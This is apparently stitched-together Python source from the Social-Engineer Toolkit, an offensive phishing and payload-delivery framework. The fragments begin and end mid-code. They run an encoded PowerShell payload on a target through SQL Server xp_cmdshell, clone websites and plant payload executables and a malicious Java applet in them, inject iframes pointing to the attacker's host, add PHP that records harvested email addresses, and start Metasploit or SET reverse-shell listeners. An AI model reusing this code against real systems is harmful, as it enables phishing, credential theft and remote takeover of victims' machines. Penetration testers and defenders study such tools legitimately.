pexpect.spawn("python src/html/fasttrack_http_server.py") # grab the port options if os.path.isfile("%s/src/program_junk/port.options" % (definepath)): fileopen = file("%s/src/program_junk/port.options" % (definepath), "r") port = fileopen.read().rstrip() # if for some reason the port didnt get created we default to 443 if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)): port = "443" # default 443 # launch the python listener through pexpect # need to change the directory real quick os.chdir(definepath) child2 = pexpect.spawn( "python src/payloads/set_payloads/listener.py %s" % (port)) # now back os.chdir("src/program_junk/web_clone/") setcore.PrintStatus("Triggering payload stager...") # thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified import thread # execute the payload # we append more commands if option 1 is used if option == "1": random_exe_execute = random_exe random_exe = "powershell -EncodedCommand " + powershell_command sql_command = ("xp_cmdshell '%s'" % (random_exe)) # start thread of SQL command that executes payload thread.start_new_thread(target_server.execute_query, (sql_command, )) time.sleep(5) # trigger the exe if option 1 is used if option == "1": sql_command = ("xp_cmdshell '%s'" % (random_exe_execute)) thread.start_new_thread(target_server.execute_query, (sql_command, )) # if pexpect doesnt exit right then it freaks out try: # interact with the child process through pexpect child2.interact() subprocess.Popen("rm x 1> /dev/null 2> /dev/null", shell=True).wait() except: pass
def web_server_start(): # define if use apache or not apache = False # open set_config here apache_check = core.check_config("APACHE_SERVER=").lower() if apache_check == "on" or track_email == "on": apache_path = core.check_config("APACHE_DIRECTORY=") if os.path.isdir(os.path.join(apache_path, "html")): os.path.join(apache_path, "html") apache = True if operating_system == "windows": apache = False # specify the web port web_port = core.check_config("WEB_PORT=") # see if exploit requires webdav if os.path.isfile(os.path.join(core.setdir, "meta_config")): with open(os.path.join(core.setdir, "meta_config")) as fileopen: for line in fileopen: line = line.rstrip() match = re.search("set SRVPORT 80", line) if match: match2 = re.search("set SRVPORT 8080", line) if not match2: web_port = 8080 # check ip address if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("Enter your ip address: ") # unless we create template do self template = "SELF" # Grab custom or set defined if os.path.isfile(os.path.join(core.setdir, "site.template")): with open(core.setdir, "site.template") as fileopen: for line in fileopen: line = line.rstrip() template_match = re.search("TEMPLATE=", line) url_match = re.search("URL=", line) if url_match: # define url to clone here url = line.split("=")[1].rstrip() if template_match: template = line.split("=")[1] # if attach vector isn't set just set a default template attack_vector = "nada" # grab web attack selection if os.path.isfile(os.path.join(core.setdir, "attack_vector")): with open(os.path.join(core.setdir, "attack_vector")) as fileopen: for line in fileopen: attack_vector = line.rstrip() # Sticking it to A/V below rand_gen = random_string() # check multiattack flags here multiattack_harv = "off" if os.path.isfile(os.path.join(core.setdir, "multi_harvester")): multiattack_harv = "on" if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")): multiattack_harv = "on" # If SET is setting up the website for you, get the website ready for # delivery if template == "SET": # change to that directory os.chdir("src/html/") # remove stale index.html files if os.path.isfile("index.html"): os.remove("index.html") # define files and get ipaddress set in index.html if attack_vector == "java": with open("index.template") as fileopen, \ open("index.html", "w") as filewrite: for line in fileopen: match1 = re.search("msf.exe", line) if match1: line = line.replace("msf.exe", rand_gen) match = re.search("ipaddrhere", line) if match: line = line.replace("ipaddrhere", ipaddr) filewrite.write(line) # move random generated name shutil.copyfile("msf.exe", rand_gen) # define browser attack vector here if attack_vector == "browser": with open("index.template") as fileopen, \ open("index.html", "w") as filewrite: for line in fileopen: counter = 0 match = re.search(applet_name, line) if match: line = line.replace(applet_name, "invalid.jar") filewrite.write(line) counter = 1 match2 = re.search("<head>", line) if match2: if web_port != 8080: line = line.replace( "<head>", '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>' .format(ipaddr)) filewrite.write(line) counter = 1 if web_port == 8080: line = line.replace( "<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>' .format(ipaddr)) filewrite.write(line) counter = 1 if counter == 0: filewrite.write(line) if template == "CUSTOM" or template == "SELF": # Bring our files to our directory if attack_vector != 'hid' and attack_vector != 'hijacking': print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC) # copy all the files needed if not os.path.isfile(os.path.join(core.setdir, applet_name)): shutil.copyfile( os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name)) shutil.copyfile( os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name)) if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")): nix = core.check_options("NIX.BIN=") shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix)) if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")): mac = core.check_options("MAC.BIN=") shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac)) if os.path.isfile(os.path.join(core.setdir, "msf.exe")): win = core.check_options("MSF.EXE=") shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win)) # pull random name generation core.print_status( "The site has been moved. SET Web Server is now listening..") rand_gen = core.check_options("MSF_EXE=") if rand_gen: if os.path.isfile(os.path.join(core.setdir, "custom.exe")): shutil.copyfile( os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe")) print( "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now" ) shutil.copyfile( os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen)) # if docbase exploit do some funky stuff to get it to work right if os.path.isfile(os.path.join(core.setdir, "docbase.file")): docbase = ( r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <HTML> <HEAD> <TITLE></TITLE> </HEAD> <FRAMESET rows="99%%, 1%%"> <FRAME src="site.html"> <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080"> </FRAMESET> </HTML>""".format(ipaddr)) if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")): os.remove(os.path.join(core.setdir, "web_clone/site.html")) shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"), os.path.join(core.setdir, "web_clone/site.html")) with open(core.setdir + "/web_clone/index.html", "w") as filewrite: filewrite.write(docbase) ########################################################################## # # START WEB SERVER STUFF HERE # ########################################################################## if not apache: if multiattack_harv == 'off': try: # specify port listener here # specify the path for the SET web directories for the applet # attack path = os.path.join(core.setdir, "web_clone/") try: import src.core.webserver as webserver p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path)) p.start() except: thread.start_new_thread(webserver.start_server, (web_port, path)) # Handle KeyboardInterrupt except KeyboardInterrupt: core.exit_set() # Handle Exceptions except Exception as e: core.log(e) print( "{0}[!] ERROR: You probably have something running on port 80 already, Apache??" "[!] There was an issue, printing error: {1}{2}".format( core.bcolors.RED, e, core.bcolors.ENDC)) stop_apache = input("Attempt to stop Apache? y/n: ") if stop_apache == "yes" or stop_apache == "y" or stop_apache == "": subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait() try: # specify port listener here import src.core.webserver as webserver # specify the path for the SET web directories for the # applet attack path = os.path.join(core.setdir + "web_clone") p = multiprocessing.Process( target=webserver.start_server, args=(web_port, path)) p.start() except: print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}". format(core.bcolors.RED, core.bcolors.ENDC)) sys.exit() # if we are custom, put a pause here to not terminate thread on web # server if template == "CUSTOM" or template == "SELF": custom_exe = core.check_options("CUSTOM_EXE=") if custom_exe: while True: # try block inside of loop, if control-c detected, then # exit try: core.print_warning( "Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!" ) input( "\n{0}[*] Web Server is listening. Press Control-C to exit.{1}" .format(core.bcolors.GREEN, core.bcolors.ENDC)) # handle keyboard interrupt except KeyboardInterrupt: print("{0}[*] Returning to main menu.{1}".format( core.bcolors.GREEN, core.bcolors.ENDC)) break if apache: subprocess.Popen("cp {0} {apache_path};" "cp {1} {apache_path};" "cp {2} {apache_path};" "cp {3} {apache_path};" "cp {4} {apache_path}".format( os.path.join(definepath, "src/html/*.bin"), os.path.join(definepath, "src/html/*.html"), os.path.join(core.setdir, "web_clone/*"), os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "*.jar"), apache_path=apache_path), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).wait() # if we are tracking users if track_email == "on": now = datetime.datetime.today() with open( os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite: filewrite.write("") subprocess.Popen("chown www-data:www-data '{0}'".format( os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait() # here we specify if we are tracking users and such with open(os.path.join(apache_path, "index.html")) as fileopen: data = fileopen.read() data = data.replace( "<body>", "<body>" "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n" "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */" .format(now)) with open(os.path.join(apache_path, "index.php"), "w") as filewrite: filewrite.write(data) core.print_status( "All files have been copied to {}".format(apache_path)) ########################################################################## # # END WEB SERVER STUFF HERE # ########################################################################## if operating_system != "windows": # Grab metaspoit path msf_path = core.meta_path()
# Dave Kennedy (@hackingdave) # ########################################################################## ########################################################################## ########################################################################## # # grab the interface ip address # ipaddr = core.grab_ipaddress() # # metasploit_path here # msf_path = core.meta_path() + "msfconsole" ################################################################ # # shell exec payload hex format below packed via upx # # shellcodeexec was converted to hex via binascii.hexlify: # # import binascii # fileopen = open("shellcodeexec.exe", "wb") # data = fileopen.read() # data = binascii.hexlify(data) # filewrite = open("hex.txt", "w") # filewrite.write(data) # filewrite.close() #
#!/usr/bin/python import subprocess import os import re import sys from src.core import setcore # definepath definepath=os.getcwd() sys.path.append(definepath) meta_path = setcore.meta_path() # launch msf listener setcore.PrintInfo("The payload can be found in the SET home directory.") choice = raw_input(setcore.setprompt("0", "Start the listener now? [yes|no]")) if choice == "yes" or choice == "y": # if we didn't select the SET interactive shell as our payload if not os.path.isfile("src/program_junk/set.payload"): setcore.PrintInfo("Please wait while the Metasploit listener is loaded...") subprocess.Popen("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (meta_path), shell=True).wait() # if we did select the set payload as our option if os.path.isfile("src/program_junk/set.payload"): fileopen = file("src/program_junk/port.options", "r") set_payload = file("src/program_junk/set.payload", "r") port = fileopen.read().rstrip() set_payload = set_payload.read().rstrip() if set_payload == "SETSHELL":